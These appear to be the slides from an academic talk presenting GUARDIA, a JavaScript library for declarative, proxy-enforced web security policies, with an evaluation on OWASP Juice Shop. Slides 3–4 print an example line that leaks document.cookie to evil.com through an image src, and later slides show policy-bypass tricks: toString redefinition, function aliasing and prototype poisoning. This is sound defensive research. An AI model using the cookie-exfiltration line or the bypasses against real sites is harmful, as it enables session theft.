Slide 1

Declaratively Specifying Security Policies For Web Applications
Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix
{ascullpu, jens.nicolay, egonzale}@vub.ac.be

Slide 2

Motivation

Figure: a page in the browser composed from several sources (search, stock services, weather information, advertisement, …).

Slide 3

Motivation

Figure: the browser objects Window, Document, Location, History, … are exposed to all code in the composed page.

    let evilImage = document.createElement('img');
    evilImage.src = 'http://evil.com?user=' + document.cookie;

Slide 4

Security policy

    let evilImage = document.createElement('img');
    evilImage.src = 'http://evil.com/takeThis?user=' + document.cookie;

A security policy restricts application behavior to prevent vulnerabilities/attacks. Example: a policy that restricts which URLs are allowed in the src of images.

Slide 5

Security policies at browser level

Content Security Policy on my.cite.com:

    default-src 'self' good.com; script-src 'self';

Allowed: my.cite.com (self), good.com
Blocked: <script src="//attacker.com/code.js"> (attacker.com)

Slide 6

Security policies at browser level

    script-src 'self' https://whitelisted.com; object-src 'none';

JSONP-like endpoint in whitelist: ">'>

Slide 7

How can application-dependent security policies be expressed?

Slide 8

Related work: Safe Wrappers and Sane Policies for Self Protecting JavaScript

    enforcePolicy({target: document, method: 'createElement'},
      function (invocation) {
        var str = stringOf(invocation, 0);
        if (str.indexOf('iframe') >= 0) {
          return;
        } else {
          invocation.proceed();
        }
      });

• Flexible.
• Programmers have to write code to enforce the policy.
• Programmers have no control over the execution order of the policies.

J. Magazinius, P. H. Phung, and D. Sands. Safe Wrappers and Sane Policies for Self Protecting JavaScript. In Informatics, pages 239–255. Berlin, Heidelberg, 2012.

Slide 9

Related work: ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser

    around(document.createElement, function (c : K, tag : U) {
      let elt : U = uCall(document, c, tag);
      if (elt.nodeName == "IFRAME") throw 'err';
      else return elt;
    });

• Flexible.
• Capable of expressing a wide range of policies.
• Programmers have to write code to enforce the policy.
• Limited portability.

L. A. Meyerovich and B. Livshits. ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser. pages 481–496. IEEE, 2010.

Slide 10

Slide 10 text

GUARDIA Our approach 10 Policies should be composable. Policies should be easy to develop. Programmers should be out of concern about the enforcement mechanism.

Slide 11

Slide 11 text

Construct Description Allow(arr : Array) => TBase Limit the execution to the supplied properties Deny(arr : Array) => TBase Deny the execution of the supplied properties Not(p: TBase) => TBase Negates the result of the policy given as parameter And(pArr: Array) => TBase Perform logical and using policies given as parameters Or(pArr: Array) => TBase Perform logical or using policies given as parameters ParamAt((...ps)=> Boolean, pIdx: Number, arr : Array) => TBase Apply a function to one parameter of the actual execution StateFnParam((...ps)=> Boolean,s: String, arr : Array) => TBase Apply a function to one state during an execution step API of GUARDIA concepts 11

Slide 12

Slide 12 text

A policy that restrict which URLs are allowed in the src of images Security policy specification with GUARDIA 12 let whiteListedSrc = ac.Or(ac.And(ac.Allow(['src']), ac.ParamInList(0,whiteURLs)), ac.Not(ac.Allow([‘src'])));

Slide 13

Slide 13 text

Can JavaScript’s reflective capabilities be employed to enforce security policies without compromising the transparency and tamper-proofness? 13

Slide 14

Slide 14 text

14 Enforcement mechanism The enforcement mechanism should be portable across different platforms. The enforcement mechanism should be tamper-proof. The enforcement mechanism should be transparent.

Slide 15

Slide 15 text

Document Proxy Attacker Document Attacker ? Attacker model and enforcement mechanism Monitor the execution to uphold security policies 15 All loaded code sources are potentially malicious!

Slide 16

Slide 16 text

window document location history … window = makeSecureProxy(window); … Problems with browser’s builtin objects 16 Unable to override builtin objects Builtin objects

Slide 17

Slide 17 text

Built-in Regular Function proxies wrap every method of the target Object proxy wrap the entire target GUARDIA’s enforcement approach 17

Slide 18

Slide 18 text

{ whenRead : [], readListeners : [], whenWrite : [], writeListeners: [] } … { get: function(tar, prop, rec) //security policy enforcement return Reflect.get(tar, prop, rec); }, set: function(tar, prop, val, rec){ //security policy enforcement return Reflect.set(tar, prop, val, rec); } } Policy configuration object Deployment of security policies 18 … { apply: function (targetFn, thisArg, arglist) { //security enforcement return targetFn.apply(thisArg, arglist); } }

Slide 19

Slide 19 text

Policy configuration object Enforcing policies in GUARDIA 19 ac.installPolicy({ whenRead: [ac.Not(ac.And(ac.Allow([‘createElement']), ac.ParamAt(equals, 0, 'iframe')))] }).on(document)

Slide 20

Slide 20 text

var liarObj = { value: 'div', toString: function(){ var t = this.value; this.value = 'iframe'; return t; } } console.log(liarObj.toString()); //div console.log(liarObj.toString()); //iframe toString and valueOf redefinition 20 Example of toString redefinition Not( And( Allow([‘createElement’]), ParamAt(equals, 0, ’iframe’)) Not( And( Allow([‘createElement’]), ParamAt(equals, stringOf(0), ’iframe’)) Gets the string value once!

Slide 21

Slide 21 text

Function aliasing 21 Attacker’s code var openCopy = window.open … installPolicy({ whenRead: [Deny([‘open’])] }).on(window) … openCopy.call(window,’bad.com’) Code for security Security bypassed … … First executed script

Slide 22

Slide 22 text

Prototype poisoning 22 var allowedUrls = { ‘valid.com’ : true } function isAllowed(url){ return allowedUrls[url] === true; } isAllowed(‘invalid.com’); //false Object.prototype[‘invalid.com’] = true; isAllowed(‘invalid.com’); //true Object.seal(Object.prototype); ECMAScript 5 features that allows prevent unintended changes in objects
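Added example (not from the slides): the slide's isAllowed() beside a hardened lookup over a prototype-less table, with a demo that poisons Object.prototype, compares both lookups and then removes the poisoned property again. isAllowedSafe and demoPoisoning are hypothetical names.

```javascript
// Added example, not GUARDIA's code. The slide's lookup: a plain object whose
// property access walks the prototype chain, so Object.prototype leaks in.
const allowedUrls = { 'valid.com': true };
function isAllowed(url) {
  return allowedUrls[url] === true;
}
// Hardened lookup: Object.create(null) has no prototype, so only own
// properties can ever be found (this also neutralises a '__proto__' key).
const allowedUrlsSafe = Object.assign(Object.create(null), { 'valid.com': true });
function isAllowedSafe(url) {
  return allowedUrlsSafe[url] === true;
}
// The slide's alternative, Object.seal(Object.prototype), would make the
// poisoning assignment below a no-op (a TypeError in strict mode).
function demoPoisoning() {
  const before = [isAllowed('invalid.com'), isAllowedSafe('invalid.com')];
  Object.prototype['invalid.com'] = true; // the poisoning from the slide
  const after = [isAllowed('invalid.com'), isAllowedSafe('invalid.com')];
  delete Object.prototype['invalid.com']; // undo so later code is unaffected
  return { before, after };
}
```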

Slide 23

Slide 23 text

1 Injection 2 Broken Authentication and Session Management 3 Cross Site Scripting 4 Insecure Direct Object Reference 5 Security Misconfiguration 6 Sensitive Data Exposure 7 Missing Function Level Access Control 8 Cross Site Request Forgery 9 Using Components with Known Vulnerabilities 10 Unvalidated Redirects and Forwards https://www.owasp.org OWASP Top ten vulnerabilities 23

Slide 24

Slide 24 text

Attack type Security policy HV [6] Yu et al. [28] Phung et al. [20] ML [15] GUARDIA Forgery Limited number of popup windows opened (P1) 3 3 3 3 3 Forgery No popup windows without location and status bar 3 3 Resource abuse Prevent abuse of resources like modal dialogues (P2) 3 3 3 3 Restoring built-ins from frames Disallow dynamic iframe creation (P3) 3 3 3 Information leakage Disabling page redirects after document.cookie read (P4) 3 3 3 3 3 Information leakage Allowing redirections for a whitelist of URLs (P5) 3 3 3 Information leakage Restrict XMLHttpRequest to secure connections and whitelist URLs (P6) 3 3 Information leakage Disallow setting of src property 3 3 Information leakage Disallow setting of location property 3 3 3 Impersonation XMLHttpRequest is restricted to HTTPS connections (P6) 3 3 Impersonation / Information leakage Disallow open and send methods of XHR object 3 3 3 Man in the middle postMessage can only send to the origins in a whitelist (P7) 3 3 Run arbitrary code*(fix) Disallow string arguments to setInterval & setTimeout (P8) 3 3 Table 1. Comparison of approaches in security policies. Policy numbers P1 to P8 refer to the policies discussed in section 4. Results 24

Slide 25

Slide 25 text

OWASP Juice Shop https://juice-shop.herokuapp.com/ Applying GUARDIA to an existing application 25 https://juice-shop.herokuapp.com/#/score-board Vulnerabilities and challenges

Slide 26

Slide 26 text

Applying GUARDIA to Juice Shop 26

Slide 27

Slide 27 text

Applying GUARDIA to Juice Shop 27 … … … let noAlert = Deny([‘alert’,’prompt','confirm']); … installPolicy({ whenRead: [noAlert], … }).on(window); …

Slide 28

Slide 28 text

Conclusion We presented GUARDIA an internal DSL for securing Javascript applications. GUARDIA is agnostic of the underlying enforcement mechanism. GUARDIA is able to express wide range of security policies from related literature. 28

Slide 29

Slide 29 text

Declaratively Specifying Security Policies For Web Applications Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.ac.be 29